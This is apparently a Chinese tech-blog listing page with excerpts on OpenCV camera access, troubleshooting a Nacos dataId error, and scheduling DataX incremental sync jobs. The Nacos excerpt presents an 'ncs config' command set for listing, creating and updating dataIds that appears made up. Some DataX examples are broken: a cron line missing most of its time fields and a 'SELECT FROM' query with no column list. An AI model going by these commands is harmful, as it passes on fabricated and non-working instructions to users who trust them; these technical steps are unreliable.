...定高效的通信链路。 OpenCV (Open Source Computer Vision Library) , OpenCV是一个开源的计算机视觉库,提供了一系列图像处理和计算机视觉相关的算法。在本篇文章的语境下,开发者使用Windows 7操作系统结合Visual Studio 2010开发环境以及OpenCV库,能够方便地调用VideoCapture类来控制和获取网络摄像机拍摄的图像数据,无需依赖特定的SDK,简化了摄像机设备的编程接入流程。 SDK (Software Development Kit) , SDK是软件开发工具包的简称,通常包含一组预编译的程序库、API接口、文档说明以及其他相关资源,旨在帮助开发者更便捷高效地创建应用软件。在本文所讨论的场景中,虽然传统观念认为调用工业级摄像机可能需要特定的SDK支持,但实际操作中,通过OpenCV的VideoCapture类已经可以实现对Basler_acA1300-30gc摄像机的基本功能操控,对于一般应用场景而言,不再强制要求使用相机厂商提供的SDK进行开发。
2023-09-02 09:33:05
581
转载
Nacos
...可以帮助开发者更好地管理和服务化配置项,从而提高开发效率。在实际用起来的时候,我们免不了会碰到各种乱七八糟的问题。其中有一个挺常见的问题就是“Nacos error, dataId: gatewayserver-dev-${server.env}.yaml”,这个错误消息大家可能都不陌生吧。本文将详细介绍这个问题的原因和解决方案。 二、问题原因分析 当我们尝试访问Nacos中的某个数据ID(dataId)时,如果发现出现了错误,那么很可能是由于以下几个原因造成的: 1. Nacos服务器未启动或未成功连接到数据库。在这种情况下,我们得瞅瞅Nacos服务器的状态咋样了,确保它已经顺利启动并且稳稳地连上了数据库。 2. dataId不存在或者被删除了。如果dataId不存在或者已经被删除,那么在访问这个dataId时就会出现问题。 3. 数据更新不及时。如果Nacos中的数据没有及时更新,那么在访问这个dataId时也可能会出现问题。 三、解决方案 对于上述问题,我们可以采取以下几种方式来解决: 1. 检查Nacos服务器状态 首先,我们需要检查Nacos服务器的状态,确保其已经成功启动并连接到了数据库。如果Nacos服务器尚未启动,我们可以按照如下步骤进行操作: 1) 打开终端,输入命令 service nacos start 启动Nacos服务器; 2) 等待一段时间后,再次输入命令 netstat -anp | grep 8848 查看Nacos服务器的监听端口是否处于监听状态; 3) 如果处于监听状态,那么恭喜您,Nacos服务器已经成功启动!如果处于关闭状态,那么您可以尝试重启Nacos服务器; 4) 另外,我们还需要检查Nacos服务器的配置文件,确保其配置无误,并且已经连接到了数据库。如果配置文件存在问题,您可以参考Nacos官方文档来进行修复。 2. 确认dataId是否存在 其次,我们需要确认dataId是否存在。如果dataId找不着了,那咱们就得动手去找找相关的配置文件,然后把它塞到Nacos服务器里头去。具体操作如下: 1) 打开终端,输入命令 ncs config list --group application 查找与当前环境相关的所有dataId; 2) 如果找不到相关dataId,那么我们可以尝试创建一个新的dataId,并将其添加到Nacos服务器中。具体的创建和添加步骤如下: 1. 创建新的dataId 输入命令 ncs config create --group application --name gatewayserver-dev-${server.env}.yaml --type yaml --label development; 2. 将新的dataId添加到Nacos服务器中 输入命令 ncs config put --group application --name gatewayserver-dev-${server.env}.yaml --content '{"server": {"env": "development"} }'; 3. 更新Nacos中的数据 最后,我们需要确保Nacos中的数据能够及时更新。具体的操作步骤如下: 1) 打开终端,输入命令 ncs config update --group application --name gatewayserver-dev-${server.env}.yaml --content '{"server": {"env": "development"} }' 更新dataId的内容; 2) 然后,我们需要等待一段时间,让Nacos服务器能够接收到更新的数据。在等待的过程中,我们可以通过监控Nacos服务器的状态,来查看数据是否已经更新完成; 3) 当数据更新完成后,我们就可以顺利地访问dataId了。 四、总结 总的来说,当我们在使用Nacos时遇到问题时,我们不应该轻易放弃,而应该积极寻找解决问题的方法。这篇内容呢,主要是围绕着“Nacos error, dataId: gatewayserver-dev-${server.env}.yaml”这个小麻烦,掰开了揉碎了讲了它的来龙去脉,还有咱们怎么把它摆平的解决之道。希望这份心得能帮到大家,让大家在使用Nacos的时候更加得心应手,畅行无阻~在未来的求学和工作中,我真心希望大家伙儿能更注重抓问题的核心本质,别只盯着表面现象浮光掠影!
2023-09-10 17:16:06
55
繁华落尽_t
Datax
...言 DataX,阿里开源的一款高性能、稳定可靠的数据同步工具,以其强大的异构数据源之间高效稳定的数据迁移能力,被广泛应用于大数据领域。这篇内容,咱们要接地气地聊聊怎么巧妙灵活运用DataX这把利器,来一键实现数据自动更新的魔法,让咱们的数据搬运工作变得更智能、更自动化,轻松省力。 1. DataX的基本原理与配置 首先,理解DataX的工作原理至关重要。DataX通过定义job.json配置文件,详细描述了数据源、目标源以及数据迁移的规则。每次当你运行DataX命令的时候,它就像个聪明的小家伙,会主动去翻开配置文件瞧一瞧,然后根据里边的“秘籍”来进行数据同步这个大工程。 例如,以下是一个简单的DataX同步MySQL到HDFS的job.json配置示例: json { "job": { "content": [ { "reader": { "name": "mysqlreader", "parameter": { "username": "root", "password": "your_password", "connection": [ { "jdbcUrl": ["jdbc:mysql://localhost:3306/test?useSSL=false"], "table": ["table_name"] } ] } }, "writer": { "name": "hdfswriter", "parameter": { "path": "/user/hive/warehouse/table_name", "defaultFS": "hdfs://localhost:9000", "fileType": "text", "fieldDelimiter": "\t" } } } ], "setting": { "speed": { "channel": "5" } } } } 这段代码告诉DataX从MySQL的test数据库中读取table_name表的数据,并将其写入HDFS的指定路径。 2. 数据自动更新功能的实现策略 那么,如何实现数据自动更新呢?这就需要借助定时任务调度工具(如Linux的cron job、Windows的任务计划程序或者更高级的调度系统如Airflow等)。 2.1 定义定期运行的DataX任务 假设我们希望每天凌晨1点整自动同步一次数据,可以设置一个cron job如下: bash 0 1 /usr/local/datax/bin/datax.py /path/to/your/job.json 上述命令将在每天的凌晨1点执行DataX同步任务,使用的是预先配置好的job.json文件。 2.2 增量同步而非全量同步 为了实现真正的数据自动更新,而不是每次全量复制,DataX提供了增量同步的方式。比如对于MySQL,可以通过binlog或timestamp等方式获取自上次同步后新增或修改的数据。 这里以timestamp为例,可以在reader部分添加where条件筛选出自特定时间点之后更改的数据: json "reader": { ... "parameter": { ... "querySql": [ "SELECT FROM table_name WHERE update_time > 'yyyy-MM-dd HH:mm:ss'" ] } } 每次执行前,你需要更新这个update_time条件为上一次同步完成的时间戳。 2.3 持续优化和监控 实现数据自动更新后,别忘了持续优化和监控DataX任务的执行情况,确保数据准确无误且及时同步。你完全可以瞅瞅DataX的运行日志,就像看故事书一样,能从中掌握任务执行的进度情况。或者,更酷的做法是,你可以设定一个警报系统,这样一来,一旦任务不幸“翻车”,它就会立马给你发消息提醒,让你能够第一时间发现问题并采取应对措施。 结语 综上所述,通过结合DataX的数据同步能力和外部定时任务调度工具,我们可以轻松实现数据的自动更新功能。在实际操作中,针对具体配置、数据增量同步的策略还有后期维护优化这些环节,咱们都需要根据业务的实际需求和数据的独特性,灵活机动地进行微调优化。就像是烹饪一道大餐,火候、配料乃至装盘方式,都要依据食材特性和口味需求来灵活掌握,才能确保最终的效果最佳!这不仅提升了工作效率,也为业务决策提供了实时、准确的数据支持。每一次成功实现数据同步的背后,都藏着我们技术人员对数据价值那份了如指掌的深刻理解和勇往直前的积极探索精神。就像是他们精心雕琢的一样,把每一个数据点都视若珍宝,不断挖掘其隐藏的宝藏,让数据真正跳动起来,服务于我们的工作与生活。
2023-05-21 18:47:56
482
青山绿水
站内搜索
用于搜索本网站内部文章,支持栏目切换。
知识学习
实践的时候请根据实际情况谨慎操作。
随机学习一条linux命令:
id -u username
- 获取用户的UID(用户ID)。
推荐内容
推荐本栏目内的其它文章,看看还有哪些文章让你感兴趣。
2023-04-28
2023-08-09
2023-06-18
2023-04-14
2023-02-18
2023-04-17
2024-01-11
2023-10-03
2023-09-09
2023-06-13
2023-08-07
2023-03-11
历史内容
快速导航到对应月份的历史文章列表。
随便看看
拉到页底了吧,随便看看还有哪些文章你可能感兴趣。
时光飞逝
"流光容易把人抛,红了樱桃,绿了芭蕉。"